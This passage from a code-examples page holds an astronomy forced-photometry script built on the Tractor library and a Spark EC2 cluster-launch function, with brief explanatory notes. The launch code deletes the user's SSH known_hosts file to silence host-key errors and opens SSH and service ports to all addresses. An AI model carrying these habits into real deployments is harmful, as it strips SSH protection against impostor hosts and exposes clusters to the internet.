            T = fullT[J].copy()
            T.row = J
    
            # Remember which sources are within the cell (not the margin)
            T.inbounds = ((T.x-1 >= xlo) * (T.x-1 < xhi) *
                          (T.y-1 >= ylo) * (T.y-1 < yhi))
            # Shift source positions so they are correct for this subimage (cell)
            T.x -= ix0
            T.y -= iy0
    
            imstats.ninbox[celli] = sum(T.inbounds)
            imstats.ntotal[celli] = len(T)
    
            # print 'Image subregion:', img.shape
            print('Number of sources in ROI:', sum(T.inbounds))
            print('Number of sources in ROI + margin:', len(T))
            #print 'Source positions: x', T.x.min(), T.x.max(), 'y', T.y.min(), T.y.max()

            # Create tractor.Image object
            tim = Image(data=img, invvar=invvar, psf=psf, wcs=NullWCS(),
                        sky=ConstantSky(med), photocal=LinearPhotoCal(1., band=band),
                        name=opt.imgfn, domask=False)
    
            # Create tractor catalog objects
            cat = []
            for i in range(len(T)):
                # -1: SCUSS, apparently, uses FITS pixel conventions.
                src = PointSource(PixPos(T.x[i] - 1, T.y[i] - 1),
                                  Fluxes(**{band:100.}))
                cat.append(src)

            # Create Tractor object.
            tractor = Tractor([tim], cat)

            # print 'All params:'
            # tractor.printThawedParams()
            t0 = Time()
            tractor.freezeParamsRecursive('*')
            tractor.thawPathsTo('sky')
            tractor.thawPathsTo(band)
            # print 'Fitting params:'
            # tractor.printThawedParams()

            # Forced photometry
            ims0,ims1,IV,fs = tractor.optimize_forced_photometry(
                minsb=1e-3*sigma, mindlnp=1., sky=True, minFlux=None, variance=True,
                fitstats=True, shared_params=False)
            
            print('Forced photometry took', Time()-t0)
            
            # print 'Fit params:'
            # tractor.printThawedParams()

            # Record results
            T.set('tractor_%s_counts' % band, np.array([src.getBrightness().getBand(band) for src in cat]))
            T.set('tractor_%s_counts_invvar' % band, IV)
            T.cell = np.zeros(len(T), int) + celli
            if fs is not None:
                # Per-source stats
                for k in ['prochi2', 'pronpix', 'profracflux', 'proflux', 'npix']:
                    T.set(k, getattr(fs, k))
                # Per-image stats
                for k in imstatkeys:
                    X = getattr(fs, k)
                    imstats.get(k)[celli] = X[0]
            results.append(T)

            # Make plots for the first N cells
            if celli >= 10:
                continue
    
            mod = tractor.getModelImage(0)
            ima = dict(interpolation='nearest', origin='lower',
                       vmin=med + -2. * sigma, vmax=med + 5. * sigma)
            plt.clf()
            plt.imshow(img, **ima)
            plt.title('Data')
            ps.savefig()
            
            plt.clf()
            plt.imshow(mod, **ima)
            plt.title('Model')
            ps.savefig()
            
            noise = np.random.normal(scale=sigma, size=img.shape)
            plt.clf()
            plt.imshow(mod + noise, **ima)
            plt.title('Model + noise')
            ps.savefig()
            
            chi = (img - mod) * tim.getInvError()
            plt.clf()
            plt.imshow(chi, interpolation='nearest', origin='lower', vmin=-5, vmax=5)
            plt.title('Chi')
            ps.savefig()
    

    # Merge results from the cells
    TT = merge_tables(results)
    # Cut to just the sources within the cells
    TT.cut(TT.inbounds)
    TT.delete_column('inbounds')
    # Sort them back into original order
    TT.cut(np.argsort(TT.row))
    #TT.delete_column('row')
    TT.writeto(opt.outfn)
    print('Wrote results to', opt.outfn)
    
    if opt.statsfn:
        imstats.writeto(opt.statsfn)
        print('Wrote image statistics to', opt.statsfn)

    plot_results(opt.outfn, ps)
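
The sigma estimate above is the standard robust trick: for Gaussian noise the interquartile range satisfies IQR = 2 * 0.6745 * sigma, so sigma is roughly (p75 - p25) / (2 * 0.6745), computed over unflagged pixels only. A self-contained sketch of that estimator follows (numpy only; the argument names are arbitrary).

import sys

import numpy as np


def robust_sigma(img, flag):
    # Use only unflagged pixels, as in the cell-fitting code above.
    good = img[flag == 0]
    if good.size == 0:
        print('No unflagged pixels; cannot estimate sigma')
        sys.exit(-1)
    p25, p75 = np.percentile(good, [25, 75])
    # For a Gaussian, IQR = 2 * 0.6745 * sigma.
    return (p75 - p25) / (2.0 * 0.6745)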

Example 37

Project: tractor
Source File: scuss2.py
View license
def main():
    import optparse

    parser = optparse.OptionParser('%prog [options]')
    parser.add_option('-o', dest='outfn', help='Output filename (FITS table)')
    parser.add_option('-i', dest='imgfn', help='Image input filename')
    parser.add_option('-f', dest='flagfn', help='Flags input filename')
    parser.add_option('-z', dest='flagzero', help='Flag image: zero = 0', action='store_true')
    parser.add_option('-p', dest='psffn', help='PsfEx input filename')
    #parser.add_option('-s', dest='postxt', help='Source positions input text file')
    parser.add_option('-S', dest='statsfn', help='Output image statistics filename (FITS table); optional')

    parser.add_option('--sky', dest='fitsky', action='store_true',
                      help='Fit sky level as well as fluxes?')
    parser.add_option('--band', '-b', dest='band', default='r',
                      help='Which SDSS band to use for forced photometry profiles: default %default')

    parser.add_option('-g', dest='gaussianpsf', action='store_true',
                      default=False,
                      help='Use multi-Gaussian approximation to PSF?')
    
    parser.add_option('-P', dest='plotbase', default='scuss',
                      help='Plot base filename (default: %default)')
    parser.add_option('-l', dest='local', action='store_true', default=False,
                      help='Use local SDSS tree?')

    # TESTING
    parser.add_option('--sub', dest='sub', action='store_true',
                      help='Cut to small sub-image for testing')
    parser.add_option('--res', dest='res', action='store_true',
                      help='Just plot results from previous run')

    opt,args = parser.parse_args()

    # Check command-line arguments
    if len(args):
        print('Extra arguments:', args)
        parser.print_help()
        sys.exit(-1)
    for fn,name,exists in [(opt.outfn, 'output filename (-o)', False),
                           (opt.imgfn, 'image filename (-i)', True),
                           (opt.flagfn, 'flag filename (-f)', True),
                           (opt.psffn, 'PSF filename (-p)', True),
                           #(opt.postxt, 'Source positions filename (-s)', True),
                           ]:
        if fn is None:
            print('Must specify', name)
            sys.exit(-1)
        if exists and not os.path.exists(fn):
            print('Input file', fn, 'does not exist')
            sys.exit(-1)

    lvl = logging.DEBUG
    logging.basicConfig(level=lvl, format='%(message)s', stream=sys.stdout)

    if opt.res:
        ps = PlotSequence(opt.plotbase)
        plot_results(opt.outfn, ps)
        sys.exit(0)

    sdss = DR9(basedir='.')#data/unzip')
    if opt.local:
        sdss.useLocalTree(pobj='photoObjs-new')
        sdss.saveUnzippedFiles('data/unzip')

    # Read inputs
    print('Reading input image', opt.imgfn)
    img,hdr = fitsio.read(opt.imgfn, header=True)
    print('Read img', img.shape, img.dtype)
    H,W = img.shape
    img = img.astype(np.float32)

    sky = hdr['SKYADU']
    print('Sky:', sky)

    cal = hdr['CALIA73']
    print('Zeropoint cal:', cal)
    zpscale = 10.**((2.5 + cal) / 2.5)
    print('Zp scale', zpscale)
    
    wcs = anwcs(opt.imgfn)
    print('WCS pixel scale:', wcs.pixel_scale())
    
    print('Reading flags', opt.flagfn)
    flag = fitsio.read(opt.flagfn)
    print('Read flag', flag.shape, flag.dtype)

    imslice = None
    if opt.sub:
        imslice = (slice(0, 800), slice(0, 800))
    if imslice is not None:
        img = img[imslice]
        H,W = img.shape
        flag = flag[imslice]
        wcs.set_width(W)
        wcs.set_height(H)

    print('Reading PSF', opt.psffn)
    psf = PsfEx(opt.psffn, W, H)

    if opt.gaussianpsf:
        picpsffn = opt.psffn + '.pickle'
        if not os.path.exists(picpsffn):
            psf.savesplinedata = True
            print('Fitting PSF model...')
            psf.ensureFit()
            pickle_to_file(psf.splinedata, picpsffn)
            print('Wrote', picpsffn)
        else:
            print('Reading PSF model parameters from', picpsffn)
            data = unpickle_from_file(picpsffn)
            print('Fitting PSF...')
            psf.fitSavedData(*data)

    #
    x = psf.instantiateAt(0., 0.)
    print('PSF', x.shape)
    x = x.shape[0]
    #psf.radius = (x+1)/2.
    psf.radius = 20
    
    print('Computing image sigma...')
    if opt.flagzero:
        bad = np.flatnonzero((flag == 0))
        good = (flag != 0)
    else:
        bad = np.flatnonzero((flag != 0))
        good = (flag == 0)

    igood = img[good]
    #plo,med,phi = [percentile_f(igood, p) for p in [25, 50, 75]]
    #sky = med
    plo,phi = [percentile_f(igood, p) for p in [25, 75]]
    # Wikipedia says:  IQR -> sigma:
    sigma = (phi - plo) / (0.6745 * 2)
    print('Sigma:', sigma)
    invvar = np.zeros_like(img) + (1./sigma**2)
    invvar.flat[bad] = 0.
    del bad
    del good
    del igood
    
    band = 'u'

    # Get SDSS sources within the image...

    print('Reading SDSS objects...')
    cols = ['objid', 'ra', 'dec', 'fracdev', 'objc_type',
            'theta_dev', 'theta_deverr', 'ab_dev', 'ab_deverr', 'phi_dev_deg',
            'theta_exp', 'theta_experr', 'ab_exp', 'ab_experr', 'phi_exp_deg',
            'devflux', 'expflux',
            'resolve_status', 'nchild', 'flags', 'objc_flags',
            'run','camcol','field','id',
            'psfflux', 'psfflux_ivar', 'cmodelflux', 'cmodelflux_ivar',
            'modelflux', 'modelflux_ivar',
            'extinction']
    T = read_photoobjs_in_wcs(wcs, 1./60., sdss=sdss, cols=cols)
    print('Got', len(T), 'SDSS objs')

    T.treated_as_pointsource = treat_as_pointsource(T, band_index(opt.band))

    ok,T.x,T.y = wcs.radec2pixelxy(T.ra, T.dec)
    
    # We will break the image into cells for speed -- save the
    # original full-size inputs here.
    fullinvvar = invvar
    fullimg  = img
    fullpsf  = psf
    fullT = T

    # We add a margin around each cell -- we want sources within the
    # cell, we need to include a margin of image pixels touched by
    # those sources, and also an additional margin of sources that
    # touch those pixels.
    margin = 10 # pixels

    # Number of cells to split the image into
    imh,imw = img.shape
    nx = int(np.round(imw / 400.))
    ny = int(np.round(imh / 400.))
    #nx = ny = 20
    #nx = ny = 1

    # cell positions
    XX = np.round(np.linspace(0, W, nx+1)).astype(int)
    YY = np.round(np.linspace(0, H, ny+1)).astype(int)
    
    results = []

    # Image statistics
    imstats = fits_table()
    imstats.xlo = np.zeros(((len(YY)-1)*(len(XX)-1)), int)
    imstats.xhi = np.zeros_like(imstats.xlo)
    imstats.ylo = np.zeros_like(imstats.xlo)
    imstats.yhi = np.zeros_like(imstats.xlo)
    imstats.ninbox = np.zeros_like(imstats.xlo)
    imstats.ntotal = np.zeros_like(imstats.xlo)
    imstatkeys = ['imchisq', 'imnpix', 'sky']
    for k in imstatkeys:
        imstats.set(k, np.zeros(len(imstats)))
    
    # Plots:
    ps = PlotSequence(opt.plotbase)
    
    # Loop over cells...
    celli = -1
    for yi,(ylo,yhi) in enumerate(zip(YY, YY[1:])):
        for xi,(xlo,xhi) in enumerate(zip(XX, XX[1:])):
            celli += 1
            imstats.xlo[celli] = xlo
            imstats.xhi[celli] = xhi
            imstats.ylo[celli] = ylo
            imstats.yhi[celli] = yhi
            print()
            print('Doing image cell %i: x=[%i,%i), y=[%i,%i)' % (celli, xlo,xhi,ylo,yhi))
            # We will fit for sources in the [xlo,xhi), [ylo,yhi) box.
            # We add a margin in the image around that ROI
            # Beyond that, we add a margin of extra sources
    
            # image region: [ix0,ix1)
            ix0 = max(0, xlo - margin)
            ix1 = min(W, xhi + margin)
            iy0 = max(0, ylo - margin)
            iy1 = min(H, yhi + margin)
            S = (slice(iy0, iy1), slice(ix0, ix1))

            img = fullimg[S]
            invvar = fullinvvar[S]

            if not opt.gaussianpsf:
                # Instantiate pixelized PSF at this cell center.
                pixpsf = fullpsf.instantiateAt((xlo+xhi)/2., (ylo+yhi)/2.)
                print('Pixpsf:', pixpsf.shape)
                psf = PixelizedPSF(pixpsf)
            else:
                psf = fullpsf
            psf = ShiftedPsf(fullpsf, ix0, iy0)
            
            # sources nearby
            x0 = max(0, xlo - margin*2)
            x1 = min(W, xhi + margin*2)
            y0 = max(0, ylo - margin*2)
            y1 = min(H, yhi + margin*2)
            
            # FITS pixel indexing, so -1
            J = np.flatnonzero((fullT.x-1 >= x0) * (fullT.x-1 < x1) *
                               (fullT.y-1 >= y0) * (fullT.y-1 < y1))
            T = fullT[J].copy()
            T.row = J
    
            # Remember which sources are within the cell (not the margin)
            T.inbounds = ((T.x-1 >= xlo) * (T.x-1 < xhi) *
                          (T.y-1 >= ylo) * (T.y-1 < yhi))

            # Shift source positions so they are correct for this subimage (cell)
            #T.x -= ix0
            #T.y -= iy0
    
            imstats.ninbox[celli] = sum(T.inbounds)
            imstats.ntotal[celli] = len(T)
    
            # print 'Image subregion:', img.shape
            print('Number of sources in ROI:', sum(T.inbounds))
            print('Number of sources in ROI + margin:', len(T))
            #print 'Source positions: x', T.x.min(), T.x.max(), 'y', T.y.min(), T.y.max()

            twcs = WcslibWcs(None, wcs=wcs)
            twcs.setX0Y0(ix0, iy0)

            # Create tractor.Image object
            tim = Image(data=img, invvar=invvar, psf=psf, wcs=twcs,
                        sky=ConstantSky(sky),
                        photocal=LinearPhotoCal(zpscale, band=band),
                        name=opt.imgfn, domask=False)
    
            # Create tractor catalog objects
            cat,catI = get_tractor_sources_dr9(
                None, None, None, bandname=opt.band,
                sdss=sdss, objs=T.copy(), bands=[band],
                nanomaggies=True, fixedComposites=True, useObjcType=True,
                getobjinds=True)
            print('Got', len(cat), 'Tractor sources')

            assert(len(cat) == len(catI))

            # for r,d,src in zip(T.ra[catI], T.dec[catI], cat):
            #     print 'Source', src.getPosition()
            #     print '    vs', r, d
            
            # Create Tractor object.
            tractor = Tractor([tim], cat)

            # print 'All params:'
            # tractor.printThawedParams()
            t0 = Time()
            tractor.freezeParamsRecursive('*')
            tractor.thawPathsTo(band)
            if opt.fitsky:
                tractor.thawPathsTo('sky')
            # print 'Fitting params:'
            # tractor.printThawedParams()

            minsig = 0.1

            # making plots?
            #if celli <= 10:
            #    mod0 = tractor.getModelImage(0)

            # Forced photometry
            X = tractor.optimize_forced_photometry(
                #minsb=minsig*sigma, mindlnp=1., minFlux=None,
                variance=True, fitstats=True, shared_params=False,
                sky=opt.fitsky,
                use_ceres=True, BW=8, BH=8)
            IV = X.IV
            fs = X.fitstats

            print('Forced photometry took', Time()-t0)
            
            # print 'Fit params:'
            # tractor.printThawedParams()

            # Record results
            X = np.zeros(len(T), np.float32)
            X[catI] = np.array([src.getBrightness().getBand(band) for src in cat]).astype(np.float32)
            T.set('tractor_%s_nanomaggies' % band, X)
            X = np.zeros(len(T), np.float32)
            X[catI] = IV.astype(np.float32)
            T.set('tractor_%s_nanomaggies_invvar' % band, X)
            X = np.zeros(len(T), bool)
            X[catI] = True
            T.set('tractor_%s_has_phot' % band, X)

            # DEBUG
            X = np.zeros(len(T), np.float64)
            X[catI] = np.array([src.getPosition().ra for src in cat])
            T.tractor_ra = X
            X = np.zeros(len(T), np.float64)
            X[catI] = np.array([src.getPosition().dec for src in cat])
            T.tractor_dec = X

            T.cell = np.zeros(len(T), int) + celli
            if fs is not None:
                # Per-source stats
                for k in ['prochi2', 'pronpix', 'profracflux', 'proflux', 'npix']:
                    T.set(k, getattr(fs, k))
                # Per-image stats
                for k in imstatkeys:
                    X = getattr(fs, k)
                    imstats.get(k)[celli] = X[0]

            #T.about()
            # DEBUG
            ## KK = np.flatnonzero(T.tractor_u_nanomaggies[catI] > 3.)
            ## T.cut(catI[KK])
            ## cat = [cat[k] for k in KK]
            ## catI = np.arange(len(cat))
            ## #T.about()
            ## print T.tractor_u_nanomaggies
            ## print T.psfflux[:,0]

            results.append(T.copy())

            # tc = T.copy()
            # print 'tc'
            # print tc.tractor_u_nanomaggies
            # print tc.psfflux[:,0]
            # plot_results(None, ps, tc)
            # mc = merge_tables([x.copy() for x in results])
            # print 'Results:'
            # for x in results:
            #     print x.tractor_u_nanomaggies
            #     print x.psfflux[:,0]
            # print 'Merged'
            # print mc.tractor_u_nanomaggies
            # print mc.psfflux[:,0]
            # plot_results(None, ps, mc)

            # Make plots for the first N cells
            if celli >= 10:
                continue
    
            mod = tractor.getModelImage(0)
            ima = dict(interpolation='nearest', origin='lower',
                       vmin=sky + -2. * sigma, vmax=sky + 5. * sigma,
                       cmap='gray', extent=[ix0-0.5, ix1-0.5, iy0-0.5, iy1-0.5])

            ok,rc,dc = wcs.pixelxy2radec((ix0+ix1)/2., (iy0+iy1)/2.)

            plt.clf()
            plt.imshow(img, **ima)
            plt.title('Data: ~ (%.3f, %.3f)' % (rc,dc))
            #ps.savefig()

            ax = plt.axis()
            plt.plot(T.x-1, T.y-1, 'o', mec='r', mfc='none', ms=10)
            plt.axis(ax)
            plt.title('Data + SDSS sources ~ (%.3f, %.3f)' % (rc,dc))
            ps.savefig()

            flim = 2.5
            I = np.flatnonzero(T.psfflux[catI,0] > flim)
            for ii in I:
                tind = catI[ii]
                src = cat[ii]
                fluxes = [T.psfflux[tind,0], src.getBrightness().getBand(band)]
                print('Fluxes', fluxes)
                mags = [-2.5*(np.log10(flux)-9) for flux in fluxes]
                print('Mags', mags)

                t = ''
                if type(src) == ExpGalaxy:
                    t = 'E'
                elif type(src) == DevGalaxy:
                    t = 'D'
                elif type(src) == PointSource:
                    t = 'S'
                elif type(src) == FixedCompositeGalaxy:
                    t = 'C'
                else:
                    t = str(type(src))

                plt.text(T.x[tind], T.y[tind]+3, '%.1f / %.1f %s' % (mags[0], mags[1], t), color='r',
                         va='bottom',
                         bbox=dict(facecolor='k', alpha=0.5))
                plt.plot(T.x[tind]-1, T.y[tind]-1, 'rx')

            for i,src in enumerate(cat):
                flux = src.getBrightness().getBand(band)
                if flux < flim:
                    continue
                tind = catI[i]
                fluxes = [T.psfflux[tind,0], flux]
                print('RA,Dec', T.ra[tind],T.dec[tind])
                print(src.getPosition())
                print('Fluxes', fluxes)
                mags = [-2.5*(np.log10(flux)-9) for flux in fluxes]
                print('Mags', mags)
                plt.text(T.x[tind], T.y[tind]-3, '%.1f / %.1f' % (mags[0], mags[1]), color='g',
                         va='top', bbox=dict(facecolor='k', alpha=0.5))
                plt.plot(T.x[tind]-1, T.y[tind]-1, 'g.')
                         
            plt.axis(ax)
            ps.savefig()

            # plt.clf()
            # plt.imshow(mod0, **ima)
            # plt.title('Initial Model')
            # #plt.colorbar()
            # ps.savefig()

            # plt.clf()
            # plt.imshow(mod0, interpolation='nearest', origin='lower',
            #            cmap='gray', extent=[ix0-0.5, ix1-0.5, iy0-0.5, iy1-0.5])
            # plt.title('Initial Model')
            # plt.colorbar()
            # ps.savefig()

            plt.clf()
            plt.imshow(mod, **ima)
            plt.title('Model')
            ps.savefig()
            
            noise = np.random.normal(scale=sigma, size=img.shape)
            plt.clf()
            plt.imshow(mod + noise, **ima)
            plt.title('Model + noise')
            ps.savefig()
            
            chi = (img - mod) * tim.getInvError()
            plt.clf()
            plt.imshow(chi, interpolation='nearest', origin='lower',
                       cmap='RdBu', vmin=-5, vmax=5)
            plt.title('Chi')
            ps.savefig()
    

    # Merge results from the cells
    TT = merge_tables(results)
    # Cut to just the sources within the cells
    TT.cut(TT.inbounds)
    TT.delete_column('inbounds')
    # Sort them back into original order
    TT.cut(np.argsort(TT.row))
    #TT.delete_column('row')
    TT.writeto(opt.outfn)
    print('Wrote results to', opt.outfn)
    
    if opt.statsfn:
        imstats.writeto(opt.statsfn)
        print('Wrote image statistics to', opt.statsfn)

    plot_results(opt.outfn, ps)
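
A note on the bookkeeping in the cell loop above, since it is easy to miss: each per-cell table remembers its original catalog row (T.row = J) and whether the source lies strictly inside the cell rather than in the overlap margin (T.inbounds), so that after merge_tables() the margin duplicates can be cut and the input order restored via np.argsort(TT.row). Below is a minimal sketch of just that bookkeeping, using plain numpy arrays instead of the Tractor/astrometry table objects; photometer_in_cells and the cell/margin sizes are hypothetical.

import numpy as np

def photometer_in_cells(x, y, W, H, cellsize=100, margin=10):
    # x, y: source positions in pixel coordinates (0-indexed)
    results = []
    for ylo in range(0, H, cellsize):
        for xlo in range(0, W, cellsize):
            xhi, yhi = min(W, xlo + cellsize), min(H, ylo + cellsize)
            # select sources in the cell plus a margin (photometry would run here)
            J = np.flatnonzero((x >= xlo - margin) & (x < xhi + margin) &
                               (y >= ylo - margin) & (y < yhi + margin))
            # remember which of those are strictly inside the cell
            inbounds = ((x[J] >= xlo) & (x[J] < xhi) &
                        (y[J] >= ylo) & (y[J] < yhi))
            results.append((J, inbounds))
    # keep each source only from the cell it falls strictly inside,
    # then restore the original catalog order (cf. TT.cut(np.argsort(TT.row)))
    rows = np.concatenate([J[inb] for J, inb in results])
    return rows[np.argsort(rows)]

if __name__ == '__main__':
    rng = np.random.default_rng(0)
    x, y = rng.uniform(0, 500, 200), rng.uniform(0, 300, 200)
    assert np.array_equal(photometer_in_cells(x, y, 500, 300), np.arange(200))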

Example 38

Project: sparknotebook
Source File: spark_ec2.py
View license
def launch_cluster(conn, opts, cluster_name):

  #Remove known hosts to avoid "Offending key for IP ..." errors.
  known_hosts = os.environ['HOME'] + "/.ssh/known_hosts"
  if os.path.isfile(known_hosts):
    os.remove(known_hosts)
  if opts.key_pair is None:
      opts.key_pair = keypair()
      if opts.key_pair is None:
        print >> stderr, "ERROR: Must provide a key pair name (-k) to use on instances."
        sys.exit(1)

  if opts.profile is None:
    opts.profile = profile()
    if opts.profile is None:
      print >> stderr, "ERROR: No profile found on current host. It must be provided with the -p option."
      sys.exit(1)

  public_key = pub_key()
  user_data = Template("""#!/bin/bash
  set -e -x
  echo '$public_key' >> ~root/.ssh/authorized_keys
  echo '$public_key' >> ~ec2-user/.ssh/authorized_keys""").substitute(public_key=public_key)

  print "Setting up security groups..."
  master_group = get_or_make_group(conn, cluster_name + "-master")
  slave_group = get_or_make_group(conn, cluster_name + "-slaves")
  sparknotebook_group = get_or_make_group(conn, "SparkNotebookApplication")
  if master_group.rules == []: # Group was just now created
    master_group.authorize(src_group=master_group)
    master_group.authorize(src_group=slave_group)
    master_group.authorize(src_group=sparknotebook_group)
    master_group.authorize('tcp', 22, 22, '0.0.0.0/0')
    master_group.authorize('tcp', 8080, 8081, '0.0.0.0/0')
    master_group.authorize('tcp', 18080, 18080, '0.0.0.0/0')
    master_group.authorize('tcp', 19999, 19999, '0.0.0.0/0')
    master_group.authorize('tcp', 50030, 50030, '0.0.0.0/0')
    master_group.authorize('tcp', 50070, 50070, '0.0.0.0/0')
    master_group.authorize('tcp', 60070, 60070, '0.0.0.0/0')
    master_group.authorize('tcp', 4040, 4045, '0.0.0.0/0')
    master_group.authorize('tcp', 7077, 7077, '0.0.0.0/0')
    if opts.ganglia:
      master_group.authorize('tcp', 5080, 5080, '0.0.0.0/0')
  if slave_group.rules == []: # Group was just now created
    slave_group.authorize(src_group=master_group)
    slave_group.authorize(src_group=slave_group)
    slave_group.authorize(src_group=sparknotebook_group)
    slave_group.authorize('tcp', 22, 22, '0.0.0.0/0')
    slave_group.authorize('tcp', 8080, 8081, '0.0.0.0/0')
    slave_group.authorize('tcp', 50060, 50060, '0.0.0.0/0')
    slave_group.authorize('tcp', 50075, 50075, '0.0.0.0/0')
    slave_group.authorize('tcp', 60060, 60060, '0.0.0.0/0')
    slave_group.authorize('tcp', 60075, 60075, '0.0.0.0/0')

  if not any(r for r in sparknotebook_group.rules for g in r.grants if master_group.id == g.group_id):
    sparknotebook_group.authorize(ip_protocol="tcp", from_port="1", to_port="65535", src_group=master_group)
    sparknotebook_group.authorize(ip_protocol="icmp", from_port="-1", to_port="-1", src_group=master_group)

  if not any(r for r in sparknotebook_group.rules for g in r.grants if slave_group.id == g.group_id):
    sparknotebook_group.authorize(ip_protocol="tcp", from_port="1", to_port="65535", src_group=slave_group)
    sparknotebook_group.authorize(ip_protocol="icmp", from_port="-1", to_port="-1", src_group=slave_group)

  # Check if instances are already running in our groups
  existing_masters, existing_slaves = get_existing_cluster(conn, opts, cluster_name,
                                                           die_on_error=False)
  if existing_slaves or (existing_masters and not opts.use_existing_master):
    print >> stderr,("ERROR: There are already instances running in " +
        "group %s or %s" % (master_group.name, slave_group.name))
    sys.exit(1)

  # Figure out Spark AMI
  if opts.ami is None:
    opts.ami = get_spark_ami(opts)
  print "Launching instances..."

  try:
    image = conn.get_all_images(image_ids=[opts.ami])[0]
  except:
    print >> stderr,"Could not find AMI " + opts.ami
    sys.exit(1)

  # Create block device mapping so that we can add an EBS volume if asked to
  block_map = BlockDeviceMapping()
  if opts.ebs_vol_size > 0:
    device = EBSBlockDeviceType()
    device.size = opts.ebs_vol_size
    device.delete_on_termination = True
    block_map["/dev/sdv"] = device

  # Launch slaves
  if opts.spot_price != None:
    zones = get_zones(conn, opts)
    
    num_zones = len(zones)
    i = 0
    my_req_ids = []

    for zone in zones:
      best_price = find_best_price(conn,opts.instance_type,zone, opts.spot_price)
      # Launch spot instances with the requested price
      print >> stderr,("Requesting %d slaves as spot instances with price $%.3f/hour each (total $%.3f/hour)" %
           (opts.slaves, best_price, opts.slaves * best_price))

      num_slaves_this_zone = get_partition(opts.slaves, num_zones, i)
      interface = boto.ec2.networkinterface.NetworkInterfaceSpecification(subnet_id=subnetId(), groups=[slave_group.id], associate_public_ip_address=True)
      interfaces = boto.ec2.networkinterface.NetworkInterfaceCollection(interface)

      slave_reqs = conn.request_spot_instances(
          price = best_price,
          image_id = opts.ami,
          launch_group = "launch-group-%s" % cluster_name,
          placement = zone,
          count = num_slaves_this_zone,
          key_name = opts.key_pair,
          instance_type = opts.instance_type,
          block_device_map = block_map,
          user_data = user_data,
          instance_profile_arn = opts.profile,
          network_interfaces = interfaces)
      my_req_ids += [req.id for req in slave_reqs]
      i += 1

    print >> stderr, "Waiting for spot instances to be granted"
    try:
      while True:
        time.sleep(10)
        reqs = conn.get_all_spot_instance_requests()
        id_to_req = {}
        for r in reqs:
          id_to_req[r.id] = r
        active_instance_ids = []
        for i in my_req_ids:
          if i in id_to_req and id_to_req[i].state == "active":
            active_instance_ids.append(id_to_req[i].instance_id)
        if len(active_instance_ids) == opts.slaves:
          print >> stderr, "All %d slaves granted" % opts.slaves
          reservations = conn.get_all_instances(active_instance_ids)
          slave_nodes = []
          for r in reservations:
            slave_nodes += r.instances
          break
        else:
          # print >> stderr, ".",
          print "%d of %d slaves granted, waiting longer" % (
            len(active_instance_ids), opts.slaves)
    except:
      print >> stderr, "Canceling spot instance requests"
      conn.cancel_spot_instance_requests(my_req_ids)
      # Log a warning if any of these requests actually launched instances:
      (master_nodes, slave_nodes) = get_existing_cluster(
          conn, opts, cluster_name, die_on_error=False)
      running = len(master_nodes) + len(slave_nodes)
      if running:
        print >> stderr,("WARNING: %d instances are still running" % running)
      sys.exit(0)
  else:
    # Launch non-spot instances
    zones = get_zones(conn, opts)
    num_zones = len(zones)
    i = 0
    slave_nodes = []
    for zone in zones:
      num_slaves_this_zone = get_partition(opts.slaves, num_zones, i)
      if num_slaves_this_zone > 0:
        slave_res = image.run(key_name = opts.key_pair,
                              security_group_ids = [slave_group.id],
                              instance_type = opts.instance_type,
                              subnet_id = subnetId(),
                              placement = zone,
                              min_count = num_slaves_this_zone,
                              max_count = num_slaves_this_zone,
                              block_device_map = block_map,
                              user_data = user_data,
                              instance_profile_arn = opts.profile)
        slave_nodes += slave_res.instances
        print >> stderr,"Launched %d slaves in %s, regid = %s" % (num_slaves_this_zone,
                                                        zone, slave_res.id)
      i += 1

  # Launch or resume masters
  if existing_masters:
    print "Starting master..."
    for inst in existing_masters:
      if inst.state not in ["shutting-down", "terminated"]:
        inst.start()
    master_nodes = existing_masters
  else:
    master_type = opts.master_instance_type
    if master_type == "":
      master_type = opts.instance_type
    if opts.zone == 'all':
      opts.zone = random.choice(conn.get_all_zones()).name
    if opts.spot_price != None:
      best_price = find_best_price(conn,master_type,opts.zone,opts.spot_price)
      # Launch spot instances with the requested price
      print >> stderr, ("Requesting master as spot instances with price $%.3f/hour" % (best_price))

      interface = boto.ec2.networkinterface.NetworkInterfaceSpecification(subnet_id=subnetId(), groups=[master_group.id], associate_public_ip_address=True)
      interfaces = boto.ec2.networkinterface.NetworkInterfaceCollection(interface)

      master_reqs = conn.request_spot_instances(
        price = best_price,
        image_id = opts.ami,
        launch_group = "launch-group-%s" % cluster_name,
        placement = opts.zone,
        count = 1,
        key_name = opts.key_pair,
        instance_type = master_type,
        block_device_map = block_map,
        user_data = user_data,
        instance_profile_arn = opts.profile,
        network_interfaces = interfaces)
      my_req_ids = [r.id for r in master_reqs]
      print >> stderr, "Waiting for spot instance to be granted"
      try:
        while True:
          time.sleep(10)
          reqs = conn.get_all_spot_instance_requests(request_ids=my_req_ids)
          id_to_req = {}
          for r in reqs:
            id_to_req[r.id] = r
          active_instance_ids = []
          for i in my_req_ids:
            if i in id_to_req and id_to_req[i].state == "active":
              active_instance_ids.append(id_to_req[i].instance_id)
          if len(active_instance_ids) == 1:
            print >> stderr, "Master granted"
            reservations = conn.get_all_instances(active_instance_ids)
            master_nodes = []
            for r in reservations:
              master_nodes += r.instances
            break
          else:
            # print >> stderr, ".",
            print "%d of %d masters granted, waiting longer" % (
              len(active_instance_ids), 1)
      except:
        print >> stderr, "Canceling spot instance requests"
        conn.cancel_spot_instance_requests(my_req_ids)
        # Log a warning if any of these requests actually launched instances:
        (master_nodes, slave_nodes) = get_existing_cluster(
            conn, opts, cluster_name, die_on_error=False)
        running = len(master_nodes) + len(slave_nodes)
        if running:
          print >> stderr, ("WARNING: %d instances are still running" % running)
        sys.exit(0)
    else:
      master_res = image.run(key_name = opts.key_pair,
                             security_group_ids = [master_group.id],
                             instance_type = master_type,
                             subnet_id = subnetId(),
                             placement = opts.zone,
                             min_count = 1,
                             max_count = 1,
                             block_device_map = block_map,
                             user_data = user_data,
                             instance_profile_arn = opts.profile)
      master_nodes = master_res.instances
      print >> stderr,"Launched master in %s, regid = %s" % (opts.zone, master_res.id)
  # Return all the instances
  return (master_nodes, slave_nodes)
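
Most of the sys.exit() calls in launch_cluster follow the same shape: validate an option or an AWS lookup, print the reason to stderr, and exit with a nonzero status so a wrapper script can tell the launch failed (sys.exit(0) is reserved for the deliberate bail-out after cancelling spot requests). A minimal sketch of that validate-or-exit pattern, written for Python 3 with argparse rather than the Python 2 options object used above; the option names are illustrative only.

import sys
from argparse import ArgumentParser

def parse_opts(argv=None):
    parser = ArgumentParser(description="launch a toy cluster")
    parser.add_argument("-k", "--key-pair", help="EC2 key pair name")
    parser.add_argument("-p", "--profile", help="instance profile to attach")
    opts = parser.parse_args(argv)
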